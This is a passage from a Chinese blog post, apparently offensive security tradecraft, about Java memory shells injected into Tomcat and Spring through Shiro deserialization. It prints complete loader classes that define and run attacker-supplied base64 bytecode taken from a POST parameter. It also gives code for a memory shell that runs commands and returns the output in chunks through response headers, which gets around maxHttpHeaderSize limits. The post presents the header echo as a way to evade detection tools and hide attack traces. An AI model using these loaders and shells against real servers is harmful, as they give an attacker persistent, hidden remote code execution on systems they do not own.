href=\"https:\/\/www.cnblogs.com\/yyhuni\/p\/shiroMemshell.html#2%E5%AF%BB%E6%89%BErequest%E5%AF%B9%E8%B1%A1\">https:\/\/www.cnblogs.com\/yyhuni\/p\/shiroMemshell.html#2%E5%AF%BB%E6%89%BErequest%E5%AF%B9%E8%B1%A1<\/a>\uff0c\u8fd9\u91cc\u8d34\u51fa\u76f8\u5e94\u4ee3\u7801\uff1a<\/p>\n\n\n\n<p><strong>Tomcat\u73af\u5883\u4e0b\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class ClassDataLoader extends AbstractTranslet{<br> &nbsp; &nbsp;public ClassDataLoader() throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;Object o;<br> &nbsp; &nbsp; &nbsp; &nbsp;String s;<br> &nbsp; &nbsp; &nbsp; &nbsp;String classData = null;<br> &nbsp; &nbsp; &nbsp; &nbsp;boolean done = false;<br> &nbsp; &nbsp; &nbsp; &nbsp;Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");<br> &nbsp; &nbsp; &nbsp; &nbsp;for (int i = 0; i &lt; ts.length; i++) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Thread t = ts[i];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (t == null) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;s = t.getName();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (!s.contains(\"exec\") &amp;&amp; s.contains(\"http\")) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(t, \"target\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (!(o instanceof Runnable)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.util.List ps = (java.util.List) getFV(o, \"processors\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for (int j = 0; j &lt; ps.size(); j++) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Object p = ps.get(j);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(p, \"req\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;classData = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"classData\")});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] bytecodes = org.apache.shiro.codec.Base64.decode(classData);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;defineClassMethod.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cc.newInstance();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;done = true;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (done) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public Object getFV(Object o, String s) throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field f = null;<br> &nbsp; &nbsp; &nbsp; &nbsp;Class clazz = o.getClass();<br> &nbsp; &nbsp; &nbsp; &nbsp;while (clazz != Object.class) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;f = clazz.getDeclaredField(s);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;clazz = clazz.getSuperclass();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;if (f == null) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new NoSuchFieldException(s);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;f.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp;return f.get(o);<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {<br>\u200b<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {<br>\u200b<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p><strong>Spring\u73af\u5883\u4e0b\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class MyClassLoader extends AbstractTranslet {<br> &nbsp; &nbsp;static{<br> &nbsp; &nbsp; &nbsp; &nbsp;try{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field r=request.getClass().getDeclaredField(\"request\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;javax.servlet.http.HttpSession session = request.getSession();<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;String classData=request.getParameter(\"classData\");<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] classBytes = new sun.misc.BASE64Decoder().decodeBuffer(classData);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\",new Class[]{byte[].class, int.class, int.class});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;defineClassMethod.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cc.newInstance().equals(new Object[]{request,response,session});<br> &nbsp; &nbsp; &nbsp;  }catch(Exception e){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;e.printStackTrace();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p>\u7136\u540e\u5728POST\u8bf7\u6c42\u4f53\u5904\u4f20\u5165<code>classData=\u6076\u610finterceptor\u5b57\u8282\u7801base64\u7f16\u7801<\/code> \u5373\u53ef<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4fee\u6539maxHttpHeaderSize<\/h2>\n\n\n\n<p>\u5c06Tomcat\u8fd0\u884c\u5185\u5b58\u91cc\u7684\u914d\u7f6e\u4fee\u6539\uff0c\u5bf9\u5e94Bean\u4e3a<strong><code>org.apache.coyote.http11.AbstractHttp11Protocol\u7684maxHeaderSize<\/code><\/strong><\/p>\n\n\n\n<p>\u4f46\u662f\u7531\u4e8erequest\u7684inputbuffer\u4f1a\u590d\u7528\uff0c\u6240\u4ee5\u6211\u4eec\u5728\u4fee\u6539\u5b8c\u4e4b\u540e\uff0c\u9700\u8981\u5148\u5efa\u7acb\u591a\u4e2a\u8fde\u63a5\u5c06\u590d\u7528\u7684count\u6d88\u8017\u5b8c(\u4e00\u822c\u5341\u6b21\u5de6\u53f3)\uff0c\u8ba9tomcat\u65b0\u5efarequest\u7684inputbuffer\uff0c\u8fd9\u65f6\u5019\u7684buffer\u5c31\u4f1a\u4f7f\u7528\u6211\u4eec\u4fee\u6539\u7684\u503c\u3002<\/p>\n\n\n\n<p>\u4f46\u662f\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u6267\u884c\u7684\u5b57\u8282\u7801\u5176\u672c\u8eab\u957f\u5ea6\u5c31\u5f88\u957f\uff0c\u5b9e\u9645\u610f\u4e49\u4e0d\u5927\uff1b\u5e76\u4e14\u7531\u4e8e\u592a\u957f\uff0c\u8fd9\u91cc\u5c31\u4e0d\u8d34\u4ee3\u7801\u4e86\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u5185\u5b58\u9a6c\u56de\u663e\u53d7\u9650<\/h1>\n\n\n\n<p>\u8fd9\u4e2a\u4e3b\u8981\u5229\u7528\u573a\u666f\u662f\u5728\u4e0a\u4f20jsp\u6587\u4ef6\u89e6\u53d1\u5185\u5b58\u9a6c\u7684\u60c5\u51b5\uff08\u6ce8\u5165\u5185\u5b58\u9a6c\u4e0d\u53d7maxHttpHeaderSize\u9650\u5236\uff09<\/p>\n\n\n\n<p>\u5728\u5185\u5b58\u9a6c\u56de\u663e\u7684\u65b9\u5f0f\u4e2d<strong>(\u4e0d\u51fa\u7f51)<\/strong>\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\uff1a<strong><code>response.getWriter.write(result)<\/code><\/strong>\u5c06\u56de\u663e\u5185\u5bb9\u5199\u5728<strong>Response body<\/strong>\u4e2d\uff0c\u6216\u8005\u901a\u8fc7<strong><code>response.setHeader(\"result\",result)<\/code><\/strong>\uff0c\u5c06\u56de\u663e\u5185\u5bb9\u5199\u5728\u54cd\u5e94\u5934\u91cc\u3002<\/p>\n\n\n\n<p>\u524d\u8005\u7531\u4e8e\u662f\u5728body\u4e2d\uff0c\u4e0d\u53d7maxHttpHeaderSize\u7684\u9650\u5236\uff0c\u80fd\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u56de\u663e\u5f53\u7136\u662f\u5f88\u8212\u670d\u7684\u3002\u4f46\u662f\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\uff0c\u4e0d\u5f97\u4e0d\u9009\u62e9\u5229\u7528header\u4f20\u53c2\uff1a\u50cf\u662f\u60f3\u8981\u4f7f\u7528\u4e00\u4e9b\u66f4\u4e0d\u5bb9\u6613\u88ab\u67e5\u6740\u5de5\u5177\u7684\u975eServlet\u578b\u7684\u5185\u5b58\u9a6c\uff0c\u5982Executor\u578b\uff0c\u60f3\u8981\u89e6\u53d1\u8fd9\u7c7b\u5185\u5b58\u9a6c\u5c31\u4f1a\u6d89\u53ca\u5230\u8bbf\u95ee\u4e0d\u5b58\u5728\u8def\u5f84\u7684\u8def\u5f84\u3001\u6216\u8005\u8bbf\u95ee\u5df2\u7ecf\u89c4\u8303\u4e86\u8fd4\u56de\u683c\u5f0f\u7684\u63a5\u53e3\uff0c\u5bfc\u81f4\u7684tomcat\u62a5\u9519\u8986\u76d6\u6389\u4e4b\u524d\u5728body\u4e2d\u5199\u7684\u56de\u663e\uff1b\u5e76\u4e14header\u56de\u663e\u7684\u9690\u853d\u6027\u80af\u5b9a\u6bd4body\u7684\u9690\u853d\u578b\u5927\u4e00\u70b9\uff0c\u4f60\u53ef\u4ee5\u8bbe\u7f6e\u4e00\u4e2a\u548c\u4e1a\u52a1\u76f8\u5173\u7684cookie\u540d\uff0c\u4ee5\u6b64\u62b9\u9664\u653b\u51fb\u75d5\u8ff9\u3002<\/p>\n\n\n\n<p>\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u5c31\u53c8\u56de\u5230\u4e86\u521a\u624d\u7684\u95ee\u9898\uff1a<strong>response header\u4f9d\u65e7\u53d7maxHttpHeaderSize\u9650\u5236<\/strong>\u3002<\/p>\n\n\n\n<p>\u8fd9\u65f6\u601d\u8def\u5c31\u4e0e\u4e0a\u6587\u63d0\u5230\u7684\u7b2c\u4e8c\u79cd\u7ed5\u8fc7\u65b9\u6cd5\u7c7b\u4f3c\uff0c\u5148\u5c06\u56de\u663e\u7ed3\u679c\u4fdd\u5b58\u5230\u4e00\u4e2a\u751f\u547d\u5468\u671f\u957f\u4e8e\u5355\u6b21 Request \u7684\u53d8\u91cf\u4e2d\uff0c\u5982\u524d\u6587\u7684ThreadName\uff0c\u8ba9\u540e\u7eed\u7684 Request \u90fd\u80fd\u8bfb\u53d6\u8be5\u5b58\u50a8\uff0c\u518d\u6bcf\u6b21\u54cd\u5e94\u6309\u7167 <code>(maxHttpHeaderSize-\u5176\u5b83header\u7684\u957f\u5ea6)<\/code>\u5206\u5757\u8fd4\u56de\u7ed3\u679c\u3002<\/p>\n\n\n\n<p>\u7531\u4e8e\u8fd9\u91cc\u5df2\u7ecf\u80fd\u5728\u5185\u5b58\u4e2d\u6ce8\u5165\u7c7b\u4e86\uff0c\u90a3\u4fbf\u6709\u4e2a\u66f4\u7b80\u5355\u7684\u65b9\u6cd5\uff1a<strong>\u4f7f\u7528final\u7c7b\u578b\u4fee\u9970\u7684\u53d8\u91cf\u50a8\u5b58\u56de\u663e\u7ed3\u679c<\/strong>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">final StringBuilder result = new StringBuilder();<br> public void doAction(ServletRequest req, ServletResponse res) {<br>    .....<br> &nbsp; &nbsp;result.append(b64Output);<br> &nbsp;  .....<br> }<\/pre>\n\n\n\n<p>\u5e76\u4e14\u8fd8\u8981\u6ce8\u610f\u5230\u7684\u4e00\u4e2a\u70b9\u662f\u6267\u884c\u547d\u4ee4\u548c\u83b7\u53d6\u56de\u663e\u5e94\u8be5\u5206\u60c5\u51b5\u5904\u7406\uff0c\u8fd9\u91cc\u8bbe\u8ba1\u4e86\u8bf7\u6c42\u5934action\u5982\u679c\u4e3a&#8221;getResult&#8221;\u8fdb\u884c\u8bfb\u64cd\u4f5c\uff0c\u81ea\u52a8\u83b7\u53d6maxHttpHeaderSize\u5e76\u8ba1\u7b97\u5355\u6b21\u54cd\u5e94\u80fd\u591f\u8fd4\u56de\u56de\u663e\u7684\u957f\u5ea6\uff0c\u8bbe\u7f6eresult\u54cd\u5e94\u5934\u4ee5\u53caremain\u5b57\u6bb5\u544a\u77e5\u5269\u4f59\u957f\u5ea6\uff1b\u5982\u679c\u4e3a\u5176\u5b83\u5219\u6267\u884c\u547d\u4ee4\uff0c\u5c06\u6267\u884c\u7ed3\u679c\u6216\u9519\u8bef\u3001\u5f02\u5e38\u7ed3\u679c\u5b58\u5165result\uff0c\u5982\u679c\u6210\u529f\u6267\u884c\u8fd4\u56de&#8221;execute success&#8221;\uff0c\u5931\u8d25\u5219&#8221;execute fail&#8221;\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> String action = tomcatReq.getHeader(\"action\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (\"getResult\".equals(action)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ...<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq.setAttribute(\"remainingBase64\", nextRem);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes.setHeader(\"result\", part);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }else if(action != null){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ...<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<\/pre>\n\n\n\n<p>\u5e76\u4e14\u4e3a\u4e86\u4fbf\u4e8e\u79fb\u690d\u5230\u5176\u5b83\u5185\u5b58\u9a6c\uff0c\u8fd9\u91cc\u9664\u4e86\u5c06\u6240\u6709\u903b\u8f91\u5c01\u88c5\u5230\u4e86\u4e00\u4e2a\u65b9\u6cd5\u4e2d\uff0c\u8fd8\u76f4\u63a5\u652f\u6301\u4e86\u5c06ServletRequest\u3001ServletResponse\u63a5\u53e3\u4f5c\u4e3a\u5165\u53c2\uff0c\u5728\u65b9\u6cd5\u4e2d\u5148\u8fdb\u884c\u5f3a\u8f6c\u4e3a<code>org.apache.catalina.connector.Request<\/code>\u3001<code>org.apache.catalina.connector.Response<\/code>\uff0c\u4ee5\u4fbf\u4e8e\u6240\u6709tomcat\u5185\u5b58\u9a6c\u90fd\u80fd\u76f4\u63a5\u8c03\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; &nbsp;HttpServletRequest httpReq = (HttpServletRequest) req;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HttpServletResponse httpRes = (HttpServletResponse) res;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/\/\u83b7\u53d6\u5185\u90e8Tomcat Request<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Request tomcatReq;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Field reqField = httpReq.getClass().getDeclaredField(\"request\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;reqField.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq = (Request) reqField.get(httpReq);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException ignored) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Method getReqM = httpReq.getClass().getMethod(\"getRequest\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq = (Request) getReqM.invoke(httpReq);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/\/\u83b7\u53d6\u5185\u90e8Tomcat Response<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Response tomcatRes;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Field resField = httpRes.getClass().getDeclaredField(\"response\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;resField.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes = (Response) resField.get(httpRes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException ignored) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Method getResM = httpRes.getClass().getMethod(\"getResponse\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes = (Response) getResM.invoke(httpRes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; ......<\/pre>\n\n\n\n<p>Servlet\u5185\u5b58\u9a6c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp;public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;doAction(req,res);<br> &nbsp; &nbsp; &nbsp;  }<\/pre>\n\n\n\n<p>Value\u5185\u5b58\u9a6c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> public void invoke(Request request, Response response) throws IOException, ServletException {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;doAction(request,response);<br> &nbsp; &nbsp; &nbsp;  }<\/pre>\n\n\n\n<p>\u8fd9\u91cc\u62ffServlet\u5185\u5b58\u9a6c\u4e3e\u4e2a\u4f8b\uff0c\u5b9e\u9a8c\u4ee3\u7801\u653e\u5728\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/github.com\/byname66\/demo-projects\/blob\/main\/memoryshell\/ServletTestShell.jsp\n<\/div><\/figure>\n\n\n\n<p>\u4e3a\u4e86\u8425\u9020\u5b9e\u6218\u53d7\u9650\u573a\u666f\uff0c\u8fd9\u91cc\u76f4\u63a5\u5728server.xml\u4e2d\u8bbe\u7f6emaxHttpHeaderSize=&#8221;1000&#8243;<\/p>\n\n\n\n<p><img decoding=\"async\" alt=\"image-20250625040931434\" src=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040931434.png\">!]<\/p>\n\n\n\n<p>\u6784\u9020\u5185\u5b58\u9a6c\u540e\u6267\u884cipconfig\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040014663.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040014663.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625040014663\"\/><\/div><\/figure>\n\n\n\n<p>\u4f20\u53c2getResult\u83b7\u53d6\u5230\u5206\u5757\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041111408.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041111408.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625041111408\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041445981.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041445981.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625041445981\"\/><\/div><\/figure>\n\n\n\n<p>&#8230;&#8230;<\/p>\n\n\n\n<p>\u6700\u540e\u5408\u5e76\u8d77\u6765\u89e3\u7801\u6210\u529f\u83b7\u53d6\u5b8c\u6574\u6570\u636e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/byname6.cn\/wp-content\/uploads\/2025\/06\/image-1024x561.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-original=\"http:\/\/byname6.cn\/wp-content\/uploads\/2025\/06\/image-1024x561.png\" 